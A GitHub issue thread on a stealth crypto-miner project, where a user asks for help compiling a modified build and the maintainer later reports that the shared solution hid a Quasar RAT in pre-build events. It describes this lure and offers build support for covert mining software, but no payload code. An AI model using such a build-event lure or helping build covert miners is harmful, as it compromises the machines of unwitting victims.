### ISSUE TITLE
Error compile

### ISSUE THREAD

**Issue by ghost** [UnamSanctam/SilentCryptoMiner#1533]
Hello sir , i modify miner, and when build get error: error CS0246: The type or namespace name 'MemoryStream' could not be found (are you missing a using directive or an assembly reference?). please help me with compile 
[Link removed by Unam Sanctam due to the solution containing a RAT]

**Comment by UnamSanctam** [comment]
Which Visual Studio are you using? Try using Visual Studio 2022.

Also change this line to fix a bug (it's hotfixed in the current release):
https://github.com/UnamSanctam/SilentCryptoMiner/blob/8caef3eec1040ddb982574ccd7cc3d88016f7c09/SilentCryptoMiner/Resources/Code/Includes/common.cpp#L156
To this:
```
regKey.Buffer = ((PKEY_BASIC_INFORMATION)subKeyBuffer)->Name;
regKey.Length = (USHORT)((PKEY_BASIC_INFORMATION)subKeyBuffer)->NameLength;
regKey.MaximumLength = regKey.Length;
```

**Comment by redshadow09** [comment]
> Which Visual Studio are you using? Try using Visual Studio 2022.
> 
> Also change this line to fix a bug (it's hotfixed in the current release):
> 
> https://github.com/UnamSanctam/SilentCryptoMiner/blob/8caef3eec1040ddb982574ccd7cc3d88016f7c09/SilentCryptoMiner/Resources/Code/Includes/common.cpp#L156
> 
> 
> To this:
> ```
> regKey.Buffer = ((PKEY_BASIC_INFORMATION)subKeyBuffer)->Name;
> regKey.Length = (USHORT)((PKEY_BASIC_INFORMATION)subKeyBuffer)->NameLength;
> regKey.MaximumLength = regKey.Length;
> ```

i use visual studio 2022 could you compile for me please i dont know much IT

**Comment by UnamSanctam** [comment]
If you're not making any changes to it then you can use the pre-compiled version: https://github.com/UnamSanctam/SilentCryptoMiner/releases

**Comment by redshadow09** [comment]
> If you're not making any changes to it then you can use the pre-compiled version: https://github.com/UnamSanctam/SilentCryptoMiner/releases

no no i made changes i cant get it to compile please help me

**Comment by UnamSanctam** [comment]
Download .NET Framework 4.5 if you haven't already: https://www.microsoft.com/en-US/download/details.aspx?id=30653.

**Comment by redshadow09** [comment]
> Download .NET Framework 4.5 if you haven't already: https://www.microsoft.com/en-US/download/details.aspx?id=30653.

i have but it wont compile it error

**Comment by redshadow09** [comment]
please help sir

**Comment by UnamSanctam** [comment]
Ah, I see you're trying to infect me with a Quasar RAT using pre build events in the solution. Guess I'm too helpful. Now I get why your "error" seemed too weird.

**Comment by ananinamisa** [comment]
ah unam you are very helpful i hope nothing will happen to you because of this hahaha

**Comment by UnamSanctam** [comment]
>ah unam you are very helpful i hope nothing will happen to you because of this

Fortunately I caught what he was trying to do before anything happened. I'll just have to remain more vigilant in the future.

**Comment by ananinamisa** [comment]
It's really a shame that people like this use it even though you give such a great program for free

**Comment by ananinamisa** [comment]
Take care, thanks again, I'll donate soon
